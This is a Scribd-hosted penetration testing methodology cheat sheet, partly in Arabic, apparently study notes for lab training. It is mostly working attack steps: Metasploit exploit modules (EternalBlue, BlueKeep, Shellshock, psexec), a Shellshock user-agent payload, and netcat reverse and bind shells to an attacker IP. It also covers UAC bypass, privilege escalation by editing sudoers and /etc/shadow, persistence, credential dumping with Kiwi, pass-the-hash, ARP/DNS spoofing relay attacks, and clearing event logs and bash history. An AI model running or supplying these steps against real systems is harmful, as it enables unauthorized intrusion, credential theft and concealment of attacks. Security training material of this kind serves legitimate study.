Scribd
Upload
166 views31 pages

Penetration Testing Methodology

Uploaded by

rathourmohit23
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
166 views31 pages

Penetration Testing Methodology

Uploaded by

rathourmohit23
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Penetration Testing Methodology

---------------------------------------------------------------------------------
Prepared By / Mohamed Nabil Diab
[Link]
---------------------------------------------------------------------------------

Content

1. Information Gathering
• OSINT & Public resources
• Host Discovery
• Port Scanning
• Services & OS Detection
2. Enumeration
• Service Enumeration
3. Vulnerability Assessment
• Detect Vulnerable Services
• Search for Relative Exploits
4. Exploitation
• Starting MSF
• Windows Exploitation
• Linux Exploitation
• Network Exploitation
5. Post Exploitation
• Pre Post Exploitation
• Windows Post Exploitation
• Linux Post Exploitation
6. Web Application Pen testing

1
Passive Information Gathering

Tool Type Syntax Description


host command $ host <domain/Ip> name ‫بتعمل‬
resolution
[Link] web-file domain/[Link] ‫بيحتوي على‬
[Link] web-file domain/[Link] web pages
Whois command $ whois <domain/Ip> ‫معلومات وتواريخ‬
[Link] website [Link] ‫وعناوين وأرقام‬
netcraft website [Link] Ip addresses‫و‬

dnsrecon command $ dnsrecon <domain/Ip> DNS records


dnsdumpster website [Link] Name servers
dnsenum command $ dnsenum <domain/Ip> DNS info

wafw00f command $ wafw00f <domain/Ip> ‫بتتشك لو فيه‬


firewall
sublist3r command $ sublist3r <domain/Ip> ‫بتبحث عن‬
subdomains
dirbuster command $ dirb <domain URL> directory
navigation
theHarvester Command $ theHarvester ‫بتبحث عن‬
<domain/Ip> emails
haveibeenpwned website [Link] email ‫بتتشك لو‬
‫مخترق او له‬
‫تسريب‬
Netdiscover command $ netdiscover -i <nic> -r Scan the
<subnet> LAN
nmap command $ nmap -options ‫بتعمل كل حاجة‬
<domain/Ip>

2
Nmap Usage
a) Host Discovery
• -sn ➔ default scan, disable port scanning.
• -n ➔ no DNS resolution.
• -Pn ➔ scan without ping.
b) Scanning Types
• -sS ➔ TCP SYN scan.
• -sT ➔ TCP connect scan.
• -sA ➔ TCP ACK scan.
• -sU ➔ UDP port scan.
c) Port Specification
• -p ➔ specify a port number or range.
• -p- ➔ scan for all 65535 ports
• -F ➔ fast scan for most common ports
d) Service & OS Detection
• -sV ➔ detect the versions of the running services.
• -sC ➔ run some scripts.
• -O ➔ detect the running OS.
• -A ➔detect OS and versions, perform script scanning.
e) Output Formats
• -oN ➔ normal output format.
• -oX ➔ xml output format.
• -oG ➔ greppable output format.
• -oA ➔ all output format.
f) Detection Evasion
• -f ➔ scan fragment packets.
• -D ➔ use multiple Ips with my Ip to scan.
• -sI ➔ use zombie Ip to scan.
• -source-port ➔ specify a source port.
• -T0,1,2,3,4,5 ➔ manipulate scan timing (the slowest=0).
g) Nmap Scripts
3
• ls /usr/share/nmap/scripts (directory of nmap scripts)
Vuln, smb-protocols, smb-security-mode, smb-enum-groups, smb-
enum-sessions, smb-enum-domains, smb-enum-users, smb-enum-
shares, smb-os-discovery /// http-enum, http-title /// banner.
• nmap -A <target> (perform some scripts)
• nmap -sC <target> (perform related scripts)
h) Importing Nmap result into MSF
• nmap -oX [Link] <target>
• service postgresql start
• msfconsole
• db_stats
• db_import [Link]
• hosts

Acrtive Information gathering


.ip a ‫ او‬ifconfig ‫ بتاعي باستخدام‬IP address ‫ بجيب ال‬

/etc/hosts ‫ بتاعه من ملف‬domain ‫ اللي مديني ال‬target ‫ بتاع ال‬IP ‫ بجيب ال‬

4
‫‪ ‬بعمل ‪ ping‬على ال ‪ target‬اتأكد انه ‪.active‬‬

‫‪ ‬هنا ال ‪ target‬مردش على ال ‪ ping‬بعمل ‪ nmap scan‬وبستخدم ‪.-Pn option‬‬

‫‪ ‬ممكن ال ‪ target‬يرد على ال ‪ ping‬وميطلعش حاجة ف ال ‪.scan‬‬

‫‪5‬‬
.scan all ports ‫ عشان يعمل‬-p- option ‫ في الحالة دي بضيف‬

.-sV option ‫ بستخدم‬service detection ‫ بعمل عليهم‬open ports ‫ بيطلع لي‬

.OS ‫ وال‬services ‫ وكمان ال‬target ‫ عند ال‬open ports ‫ كدا حددنا ال‬
‫ وتبدأ مرحلة ال‬Information gathering ‫ وهنا بتنتهي مرحلة ال‬
.Enumeration
------------------------------------------------------------------------------------
.Enumeration ‫ وهي ال‬phase 2 ‫ ندخل بقا على‬

6
Enumeration

Port MSF modules Utilities


auxiliary/scanner/ftp/ftp_version --script ftp-anon
21 auxiliary/scanner/ftp/ftp-login ftp target 21
use auxiliary/scanner/ftp/anonymous
auxiliary/scanner/smb/smb_version nmap -sU --top-ports 25
445
auxiliary/scanner/smb/pipe_auditor nmblookup -A <target>
(List the named pipes available over SMB (NetBIOS Computer name)
on the samba server)
smbclient -L <target> -N

smbclient -L <target> -U user


(check user’s share browsable)

smbclient //Ip/admin -U admin


(browse admin shre)

rpcclient -U "" -N <target>


(check anonymous connection)

smbmap -u user -p password -H Ip


(check shares permissions)

enum4linux -u username -p
password -U target
(list all users)
auxiliary/scanner/http/apache_userdir_enum curl -I [Link]
auxiliary/scanner/http/brute_dirs
auxiliary/scanner/http/dir_scanner nc [Link] 80
auxiliary/scanner/http/dir_listing
auxiliary/scanner/http/http_put whatweb [Link]
80 auxiliary/scanner/http/files_dir
auxiliary/scanner/http/http_login dirb [Link]
auxiliary/scanner/http/http_header
auxiliary/scanner/http/http_version --script http-enum,http-title target
auxiliary/scanner/http/robots_txt

7
auxiliary/scanner/mysql/mysql_version mysql -u username -p -h target
auxiliary/scanner/mysql/mysql_login show databases;
auxiliary/admin/mysql/mysql_enum use DBname;
3306 auxiliary/admin/mysql/mysql_sql show tables;
auxiliary/scanner/mysql/mysql_file_enum select * from tablename
auxiliary/scanner/mysql/mysql_hashdump update tablename set passfield =
auxiliary/scanner/mysql/mysql_schemadump MD5 (‘newpasswprd’) where
auxiliary/scanner/mysql/mysql_writable_dirs userfield = ‘username’

auxiliary/scanner/ssh/ssh_version
22 auxiliary/scanner/ssh/ssh_login

25 auxiliary/scanner/smtp/smtp_enum --script banner


nc target 25
> VRFY admin@[Link]
(check user admin existence)
smtp-user-enum -U file -t target
25 (check users on the server)
sendemail -f sender -t recpient -s Ip
-u Fakemail -m "Hi root, a fake
from admin" -o tls=no
(send email)
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------
‫ ونجمع كل التفاصيل بنبدأ مرحلة جديدة وهي ال‬Enumeration ‫ بعد ما بنخلص‬
‫ اللي‬services ‫ على ال‬check ‫ وهنا ببدأ اعمل‬Vulnerability Assessment
.exploit ‫ او لها‬vulnerable ‫شغالة اذا كانت حاجة منهم‬

‫ واسيرش عليهم كلهم بحثا عن‬services ‫ وال‬ports ‫ على كل ال‬scanning ‫ بعمل‬


‫ اذا كانت‬versions ‫ وأتأكد من ال‬exploitation ‫أي طريقة اعمل بها‬
.‫ ومش هتنفع معايا‬patched ‫ وال‬vulnerable

8
Most Common Vulnerabilitites

WebDAV (when we find a WebDAV extension in the web server)


▪ davtest -auth bob:password_123321 -url
[Link]
------------------------------------------------------------------------------------
Shellshock (when we find cgi script running on the website)
▪ nmap --script http-shellshock --script-args "http-
[Link]=/[Link]" <target>

------------------------------------------------------------------------------------
EternalBlue (when we find SMBv1 protocol)
▪ Nmap -p 445 --script=smb-vuln-ms17-010 <target>.

------------------------------------------------------------------------------------
Bluekeep (when we find RDP enabled)
▪ msfconsole

9
▪ search bluekeep
▪ auxiliary/scanner/rdp/cve_2019_0708_bluekeep

------------------------------------------------------------------------------------
Insecure RDP Service
(when we Find port 3389 closed but port 3333 open)
▪ msfconsole
▪ auxiliary/scanner/rdp/rdp_scanner
▪ set rport 3333

------------------------------------------------------------------------------------
‫• خالص كدا حددنا الثغرات اللي عندنا ندخل بقا على اهم مرحلة وهي تنفيذ االختراق‬
‫ اللي يستغل الثغرة ويفتح‬msf module ‫ ودي فيها هنحدد ال‬Exploitation ‫فعليا‬
.‫ عند التارجت‬meterpreter session ‫لنا‬

10
Metasploit Framework

1. Database Server
• /etc/init.d/postgresql start
• OR
• service postgresql start
------------------------------------------------------------------------------------
2. Starting the MSF
• msfconsole -q
------------------------------------------------------------------------------------
3. Creating workspaces
• workspace -a <name> (add workspace)
• setg RHOSTS <Ip> (set global variable)
• workspace -d <name> (delete workspace)
• workspace -r <name> <new-name> (rename workspace)
------------------------------------------------------------------------------------
4. Search Queries
• search type: exploit name: bluekeep
• search type: auxiliary platform: windows
------------------------------------------------------------------------------------

Windows Exploitation
1. HTTP (80) WebDAV (cadaver)
• kali
• cadaver [Link]
• >> put /usr/share/webshells/asp/[Link]
• open the browser and access the file then run commands.

11
2. HTTP (80) WebDAV (MSF)
• msfconsole
• exploit/windows/iis/iis_webdav_upload_asp
• set HttpUsername bob
• set HttpPassword password_123321
• set PATH /webdav/metasploit%RAND%.asp
---------------------------------------------------------------------------------
3. HTTP (80) Shellshock
• user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
• open Burpsuite and run the above command
• OR msfconsole
• exploit/multi/http/apache_mod_cgi_bash_env_exec
• set TARGETURI /[Link]
• set LHOST eth1
------------------------------------------------------------------------------------
4. HTTP (80) HttpFileServer httpd 2.3
• exploit/windows/http/rejetto_hfs_exec
------------------------------------------------------------------------------------
5. HTTP (8080) Apache Tomcat 8.5.19
• exploit/multi/http/tomcat_jsp_upload_bypass
------------------------------------------------------------------------------------
6. SMB (445) EternalBlue
• exploit/windows/smb/ms17_010_eternalblue
------------------------------------------------------------------------------------
7. SMB (445) server PsExec
• msfconsole
• auxiliary/scanner/smb/smb_login
• set user_file /usr/share/…./common_users.txt

12
• set pass_file /usr/share/…/unix_passwords.txt
• set verbose false
• exploit/windows/smb/psexec
• set smbuser Administrator
• set smbpass qwertyuiop
------------------------------------------------------------------------------------
8. RDP (3389) BlueKeep
• exploit/windows/ rdp/cve_2019_0708_bluekeep_rce
• show targets
• set target 2
------------------------------------------------------------------------------------
9. RDP (3389) Brute-Force
• kali
• hydra -L [Link] -P [Link] rdp://[Link]:3333
• xfreerdp /u:user /p:password /v:[Link]:3333
------------------------------------------------------------------------------------
10. WinRM (5985)
• msfconsole
• auxiliary/scanner/winrm/winrm_login
• set user_file /usr/share/…./common_users.txt
• set pass_file /usr/share/…/unix_passwords.txt
• set password “anything”
• set verbose false
• auxiliary/scanner/winrm/winrm_auth_methods

13
• auxiliary/scanner/winrm/winrm_cmd
• set username Administrator
• set password Tinkerbell
• set cmd whoami
• exploit/windows/winrm/winrm_script_exec
• set username Administrator
• set password Tinkerbell
• set force-vbc true
• meterpreter session opened
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------

Linux Exploitation
1. FTP (21) vsftpd 2.3.4
• exploit/unix/ftp/vsftpd_234_backdoor
------------------------------------------------------------------------------------
2. SAMBA (445) Samba smbd 3.X - 4.X
• exploit/linux/samba/is_known_pipename
------------------------------------------------------------------------------------
3. SSH (22) libssh 0.8.3 (protocol 2.0)
• auxiliary/scanner/ssh/libssh_auth_bypass
• set spawn_pty true
------------------------------------------------------------------------------------
4. SMTP (25) Haraka smtpd 2.8.8
• set SRVPORT 9898
• set email_to root@[Link]
• set payload linux/x64/meterpreter_reverse_http
• set LHOST eth1

14
Network Exploitation
1. NetBIOS Hacking (perform pivoting)
• nmap -p 445 --script smb-enum-users <target1>
• vim [Link]
• hydra -L [Link] -P /…/unix_passwords.txt smb://target
• msfconsole
• exploit/windows/smb/psexec
• after obtaining meterpreter session 1
• migrate -N [Link]
• shell
• ping -n 3 <target2>
• sessions 1
• run autoroute -s <target2>
• kali
• cat /etc/[Link]
• notice the last line <9050> port
• msfconsole
• auxiliary/server/socks_proxy
• set srvport 9050
• set version 4a
• kali
• proxycahins nmap -sV -Pn -p 445 -sT <target2>
• shell
• net view <target2> (display shared disks)
• net use D: \\target2\Documents
• dir D:
• type [Link]

15
2. SNMP Analysis
• nmap -sU -p 161 <target>
• ls /usr/share/nmap/scripts/ | grep -e “snmp”
• nmap -sU -p 161 --script snmp-* <target>
• find the snmp users from nmap result
• vim [Link]
• hydra -L [Link] -P …/unix_passwords.txt smb://target
------------------------------------------------------------------------------------
3. DNS & SMB Relay Attack
(we will perform arp poisoning and dns spoofing to steal auth creds)
• We have three terminals attacker, target, server
• msfconsole
• use exploit/windows/smb/smb_relay
• set lhost <attacker>
• set srvhost <attacker>
• set smbhost <server>
• set payload windows/meterpreter/reverse_tcp
• kali
• echo “attacker-Ip server-domain” > dns (fake dns)
• dnsspoof -i eth1 -f dns (dns spoofing)
• echo 1 /proc/sys/net/ipv4/ip_forward (fake arp)
• arpspoof -i eth1 -t target-Ip server-Ip
• arpspoof -i eth1 -t server-Ip target-Ip

Pre-Post Exploitation
1. Open a local server on Kali
• cd <required directory>
• python -m SimpleHTTPServer 80

16
2. Download files into windows (cmd)
• certutil -urlcache -f Kali-Ip/file-name file-name
------------------------------------------------------------------------------------
3. Download files into linux (bash)
• wget [Link]
------------------------------------------------------------------------------------
4. Transfer files to the target using netcat
• nc -nvlp 1234 > filename (on target open a listener)
• nc -nv target-Ip 1234 < filename (on Kali connect)
------------------------------------------------------------------------------------
5. Setup a bind shell
• nc -nvlp 1234 -e [Link] (on target open listener)
• nc -nv target-Ip 1234 (on Kali connect)
------------------------------------------------------------------------------------
6. Setup a reverse shell
• nc -nvlp 1234 (on Kali open a listener)
• ./[Link] -nv Kali-Ip 1234 -e [Link] (on target connect ps)

17
Windows Post Exploitation
1. Windows Local Enumeration
a. System Information
• meterpreter
• getuid
• sysinfo
• shell
• systeminfo
• wmic qfe get Caption,Description,HotFixID,InstalledOn
b. Users & Groups
• meterpreter
• getuid
• getprivs
• use post/windows/gather/enum-logged-on-users
• shell
• whoami
• whoami /priv
• net users

18
• net user administrator
• net localgroup
• net localgroup administrators
c. Network Information
• meterpreter
• ipconfig /all
• shell
• route print
• arp -a
• netstat -ano
d. Processes & Services
• meterpreter
• ps
• pgrep [Link]
• migrate PID
• shell
• net start
• wmic service list brief
• tasklist /svc
• schtasks /query /fo LIST
e. Automating Windows Local Enumeration
• msfconsole
• post/windows/gather/win_privs
• post/windows/gather/enum_logged_on_users
• post/windows/gather/checkvm
• post/windows/gather/enum_applications
• post/windows/gather/enum_computers
• post/windows/gather/enum_patches
• copy this script [Link]
• kali
• vim jaws-enum.ps1

19
• meterpreter
• cd C:\\
• mkdir temp
• cd temp
• upload /root/Desktop/jaws-enum.ps1
• shell
• [Link] -ExecutionPolicy Bypass -File .\jaws-
enum.ps1 -OutputFilename [Link]
• download [Link]
------------------------------------------------------------------------------------
2. Transferring files into windows
• kali
• cd /usr/share/windows-resources
• python -m SimpleHTTPServer 80
• windows shell
• certutil -urlcache -f Kali-Ip/file-name file-name
------------------------------------------------------------------------------------
3. Upgrading Windows Shells
• msfconsole
• sessions -u (shell-ID)
------------------------------------------------------------------------------------
4. Windows Privileges Escalation
a. Windows Kernel Exploits
• post/multi/recon/local_exploit_suggester
• run any module from the result to elevate privileges
b. UAC Bypass
• exploit/windows/local/bypassuac_injection
• set session <session-ID>
• set target (1) windows x64

20
• set payload (33) windows/x64/meterpreter/reverse_tcp
c. PrivescCheck
• get this script [Link]
• paste it on the target in PrivescCheck.ps1
• [Link] -ep bypass -c “. .\ PrivescCheck.ps1; Invoke-
PrivescCheck”
• use the credentials resulted (username:password)
• [Link] /user:username cmd
• enter the password
• you will get a privileged cmd
d. UAC Bypass: UACMe
(when we get admin user with limited privileges)
• after obtaining a meterpreter session with limited privileges
account <admin>
• migrate -N [Link]
• shell
• net localgroup Administrators (finding admin is member)
• kali
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my
Ip> LPORT=4444 -f exe > [Link]
• meterpreter session
• cd C:\\Users\\<admin>\\AppData\\Local\\Temp
• upload /root/Desktop/tools/UACME/[Link] .
• upload /root/[Link] .
• msfconsole
• exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost <my Ip>
• set lport 4444
• run

21
• meterpreter session opened
• shell
• [Link] 23 C:\
Users\<admin>\AppData\Local\Temp\[Link]
• we will find new privileged session opened in the handler.
e. Impersonation
(when login with user and need to access another user folder)
• meterpreter session
• load incognito
• list_tokens -u

• impersonate_token <Token name>


• getuid
f. Unattended Installation
• powershell
• cat C:\windows\Panther\[Link]
• search for encoded password
• decode the password via any website
• [Link] /user:Administrator cmd
• msfconsole
• exploit/windows/misc/hta_server
• run
• copy the <url>
• administrator cmd
• [Link] <url>
• we obtain a meterpreter session from Administrator

22
5. Windows Persistence
a. Persistence Service
• meterpreter (must be privileged)
• msfconsole
• exploit/windows/local/persistence_service
• set session 1
• open another tab msfconsole
• exploit/multi/handler
• set lhost eth1
• set payload windows/meterpreter/reverse_tcp
• if session 1 terminated we will obtain another session.
b. Persistence RDP
• post/windows/manage/enable_rdp
• meterpreter (must be Administrator)
• ps -N [Link]
• run getgui -e -u alice -p hack_123321
• xfreerdp /u:alice /p:hack_123321 /v:target
------------------------------------------------------------------------------------
6. Dumping & Cracking Windows Hashes
➢ Kiwi Extension
• meterpreter
• load kiwi
• creds_all
• lsa_dump_sam
• lsa_dump_secrets
➢ Pass The Hash
• after having users’ hashes
• exploit/windows/smb/psexec
• set smbuser <username>
• set smbpassword <pair of hashes>

23
• set target Native\ upload
➢ Cracking
• john --format=NT [Link] --
wordlist=/usr/share/wordlists/[Link]
➢ OR
• meterpreter
• migrate -N [Link]
• hashdump
• auxiliary/analyze/crack_windows
• set custom_wordlist /usr/share/…/unix_passwords.txt
• creds
------------------------------------------------------------------------------------
7. Pivoting
• meterpreter
• migrate -N [Link]
• ipconfig
• run autoroute -s <second target Ip>
• use auxiliary/scanner/portscan/tcp
• set rhosts <second target Ip>
• set ports 1-1000
• meterpreter
• portfwd add -l 1234 -p 80 -r <second target Ip>
• nmap -sV -sS -p 1234 localhost
• msfconsole
• exploit/windows/http/badblue_passthru
• set payload windows/meterpreter/bind_tcp
------------------------------------------------------------------------------------
8. Clearing Windows Event Logs
• meterpreter

24
• clearev
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------

Linux Post Exploitation


1. Linux Local Enumeration
a. System Information
• meterpreter
• sysinfo
• shell
• hostname
• cat /etc/issue (linux distro)
• cat /etc/*release (distro releases)
• uname -a (kernel version)
• lscpu (CPU info)
• df -h (storage info)
b. Users & Groups
• shell
• whoami (current user)
• groups <username> (groups in which user exist)
• cat /etc/passwd (all system users)
• groups (all system groups)
• who (current logged in users)
• lastlog (recently logged in users)
c. Network Information
• Meterpreter
• Ifconfig (NICs)
• Netstat (open ports)
• Route (routing table)
• Shell
• Cat /etc/networks (subnets and networks)

25
• Cat /etc/hosts (mapping domain to Ip)
• Cat /etc/[Link] (DNS address)
d. Processes & Cron Jobs
• meterpreter
• ps (list all running process)
• pgrep <processname> (search for specific PID)
• msfconsole
• ls -la /etc/cron* (list all cron jobs)
• top (display real time processes)
e. Automating Linux Local Enumeration
• Msfconsole
• post/linux/gather/enum_configs
• post/multi/gather/env
• post/linux/gather/enum_network
• post/linux/gather/enum_protections
• post/linux/gather/enum_system
• post/linux/gather/checkcontainer
• post/linux/gather/checkvm
• post/linux/gather/enum_users_history
• Copy this script [Link]
• kali
• vim [Link]
• meterpreter
• cd /tmp
• upload /root/[Link]
• shell
• chmod +x [Link]
• ./[Link]

26
2. Transferring files into windows
• kali
• cd /usr/share/windows-resources
• python -m SimpleHTTPServer 80
• linux shell
• wget Kali-Ip/file-name
------------------------------------------------------------------------------------
3. Upgrading Linux Shells
• msfconsole
• sessions -u (shell-ID)
➢ OR
• Shell
• /bin/bash -i
------------------------------------------------------------------------------------
4. Linux Privileges Escalation
a. Exploit Cron Jobs
(when we find a file’s timestamp changed periodically)
• find / -name <filename>
• ls -l <the other path including the same file>
• grep -nri "other/path/to/filename" /usr or /etc or /opt…
• after finding the script in any directory
• vim <the found script> and type “#! /bin/bash\necho "student
ALL=NOPASSWD:ALL" >> /etc/sudoers”
• sudo -l
• sudo su (now we obtain a root user)
b. Exploiting Setuid Programs
(when we find a file’s binary calling another file binary)
• ls -l (found file1 with s permission)

27
• file <file1> (ELF binary file)
• strings <file1> (find file2 in the result)
• rm <file2> (delete file2)
• cp /bin/bash <file2> (replace file2 with bash shell)
• ./<file1> (execute file1 to call file2)
• we obtain a shell with root privileges.
c. Rootkit Scanner
• shell
• ps aux (search for a process that runs a root bash shell)

• cat /bin/check-down

• Command -v chkrootkit (find the location)

• /bin/chkrootkit -V (find the version)

• searchsploit chkrootkit 0.49


• msfconsole
• exploit/unix/local/chkrootkit
• set session 1
• set lhost eth1
• set chkrootkit /bin/chkrootkit
• run (new session opened with root privileges)

28
d. Detect Weak Permissions
• shell
• find / -not -type l -perm -o+w (check writable files)
• found /etc/shadow in the result
• cat /etc/shadow (found that root has no hash)
• openssl passwd -1 -salt abc password (generate hash)
• copy the hash into /etc/shadow
• su
• enter password
• we will get a root access
e. Editing Gone Wrong
• shell
• find / -user root -perm -4000 -exec ls -ldb {} \;

• sudo -l

• sudo man ls
• enter !/bin/bash
• we will obtain a root access
29
5. Linux Persistence
a. SSH Key
• meterpreter
• msfconsole
• post/linux/manage/sshkey_persistence
• set createsshfolder true
• run (we have added a ssh key in a given path)
• kali
• cp <given path> <ssh_key>
• chmod 0400 <ssh_key>
• ssh -i <ssh_key> root@target
b. Cron Jobs
• ps -eaf

• echo "* * * * * cd /home/student/ && python -m


SimpleHTTPServer" > cron
• crontab -i cron
• crontab -l
• kali
• curl [Link]. local:8000
------------------------------------------------------------------------------------
6. Dumping & Cracking Linux Hashes
• msfconsole
• post/linux/gather/hashdump
• auxiliary/analyze/crack_linux
• set SHA512 true

30
7. Clearing Linux Tracks
• shell
• history -c
• cat /dev/null > ~/.bash_history
------------------------------------------------------------------------------------
------------------------------------------------------------------------------------

Web Application Pentesting


• dirb <url> (list hidden directories)
• curl -X OPTIONS <url> (show allowed methods)
➢ Test all pages for allowed HTTP methods
• curl -X PUT <url> --upload-file <filename> (upload file)
• curl -X DELETE <url/filename> -v (delete file)
➢ Open Burp suite and perform some testing
➢ Navigate to <target-url/[Link]/> on the browser
➢ Navigate to <target-url/[Link]/> on the browser
------------------------------------------------------------------------------------
Wmap Enumeration
• msfconsole
• load wmap
• wmap_sites -a <target Ip>
• wmap_targets -t <url>
• wmap_run -t
• wmap_run -e

31

You might also like